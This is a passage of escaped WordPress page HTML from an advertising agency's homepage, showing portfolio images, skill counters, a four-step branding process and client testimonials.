data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img data-lazy-fallback=\"1\" src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&#038;ssl=1\" alt=\"digital agency\" title=\"packaging design by what the hell\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=300%2C300&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=150%2C150&ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=768%2C768&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\"  /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_17   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_row_inner et_pb_row_inner_0\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_2 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?w=1080&#038;ssl=1\" alt=\"creative agency\" title=\"800x400\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?resize=300%2C150&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?resize=768%2C384&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?resize=480%2C240&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img data-lazy-fallback=\"1\" src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?w=1080&#038;ssl=1\" alt=\"creative agency\" title=\"800x400\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?resize=300%2C150&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?resize=768%2C384&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x400.jpg?resize=480%2C240&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\"  /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner --><div class=\"et_pb_row_inner et_pb_row_inner_1\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_1\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_3 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"creative marketing agency.\" title=\"packaging design creative advertising agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img data-lazy-fallback=\"1\" src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"creative marketing agency.\" title=\"packaging design creative advertising agency\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\"  /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_2 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_4 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"best creative agency\" title=\"Creative graphic designing\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img data-lazy-fallback=\"1\" src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"best creative agency\" title=\"Creative graphic designing\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\"  /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner -->\n			</div> <!-- .et_pb_column -->\n				</div> <!-- .et_pb_row -->\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_6 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_8\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_18  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_button_module_wrapper et_pb_button_2_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_2 et_animated et_hover_enabled et_pb_bg_layout_light\" href=\"#\" data-icon=\"&#x45;\">See More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_7 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_9 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_19  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_9 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Our Skills</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_10 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_10\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_20  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_11 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_21  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<ul class=\"et_pb_module et_pb_counters et_pb_counters_0 et_animated et-waypoint et_pb_bg_layout_light\">\n				<li class=\"et_pb_counter et_pb_counter_0\">\n				<span class=\"et_pb_counter_title\">Branding &#8211; 90%</span>\n				<span class=\"et_pb_counter_container\">\n					\n					\n					<span class=\"et_pb_counter_amount\" style=\"\" data-width=\"90%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n					<span class=\"et_pb_counter_amount overlay\" style=\"\" data-width=\"90%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n				</span>\n			</li><li class=\"et_pb_counter et_pb_counter_1\">\n				<span class=\"et_pb_counter_title\">Lead/Sales Generation Campaign &#8211; 77%</span>\n				<span class=\"et_pb_counter_container\">\n					\n					\n					<span class=\"et_pb_counter_amount\" style=\"\" data-width=\"77%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n					<span class=\"et_pb_counter_amount overlay\" style=\"\" data-width=\"77%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n				</span>\n			</li><li class=\"et_pb_counter et_pb_counter_2\">\n				<span class=\"et_pb_counter_title\">Digital Advertising &#8211; 85%</span>\n				<span class=\"et_pb_counter_container\">\n					\n					\n					<span class=\"et_pb_counter_amount\" style=\"\" data-width=\"85%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n					<span class=\"et_pb_counter_amount overlay\" style=\"\" data-width=\"85%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n				</span>\n			</li>\n			</ul> <!-- .et_pb_counters -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_8 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_11\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_22  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_5 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&#038;ssl=1\" alt=\"Best Advertising agency\" title=\"best-advertising-agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&amp;ssl=1 1080w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=300%2C172&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=1024%2C586&amp;ssl=1 1024w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=768%2C439&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=980%2C561&amp;ssl=1 980w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=480%2C275&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 1080px) 100vw, 1080px\" data-lazy-src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img data-lazy-fallback=\"1\" src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&#038;ssl=1\" alt=\"Best Advertising agency\" title=\"best-advertising-agency\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&ssl=1 1080w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=300%2C172&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=1024%2C586&ssl=1 1024w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=768%2C439&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=980%2C561&ssl=1 980w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=480%2C275&ssl=1 480w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" data-recalc-dims=\"1\"  /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_9 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_12\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_23  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_12 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT&#8217;S AN AD</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_10 et_pb_specialty_fullwidth et_pb_equal_columns et_pb_with_background et_section_specialty\" >\n				\n				\n				\n				<div class=\"et_pb_row et_pb_gutters1\">\n					<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_24   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_row_inner et_pb_row_inner_2 et_pb_equal_columns et_pb_gutters3\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_13 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Easy to start</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_14 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Just four steps</p>\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner --><div class=\"et_pb_row_inner et_pb_row_inner_3 et_pb_equal_columns et_pb_gutters3\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_4\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_6 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#x5a;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>01. BRAND AUDIT</span></h4>\n						<div class=\"et_pb_blurb_description\">Analyzing the brand with all the key parameter (As per operating environment and competition)</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_5 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_7 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe609;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>02. STRATEGY</span></h4>\n						<div class=\"et_pb_blurb_description\">Starting with the summary of the plan, Defining TG, Writing/Creating USP</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner --><div class=\"et_pb_row_inner et_pb_row_inner_4 et_pb_equal_columns et_pb_gutters3\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_6\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_8 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#x5a;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>03. EXECUTION</span></h4>\n						<div class=\"et_pb_blurb_description\">Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_7 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_9 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe609;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>04. EVALUATION</span></h4>\n						<div class=\"et_pb_blurb_description\">The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_25    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_6 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=1080&#038;ssl=1\" alt=\"digital marketing agency\" title=\"digital-marketing-agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img data-lazy-fallback=\"1\" src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=1080&#038;ssl=1\" alt=\"digital marketing agency\" title=\"digital-marketing-agency\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=300%2C300&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=150%2C150&ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=768%2C768&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\"  /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column -->\n				</div> <!-- .et_pb_row -->\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_11 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_13 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_26  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">From Our Clients</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_16  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_14\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_27  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_0 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span class=\"et_pb_testimonial_author\">P Sarvanan</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">Managing Director</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Andslite</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial --><div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_1 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span class=\"et_pb_testimonial_author\">Mrityunjaya</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">Marketing Head</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Renefurterer</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_28  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_2 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span class=\"et_pb_testimonial_author\">Amit Rathod</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">Marketing Manager</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Deutsche Bank</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial --><div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_3 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span 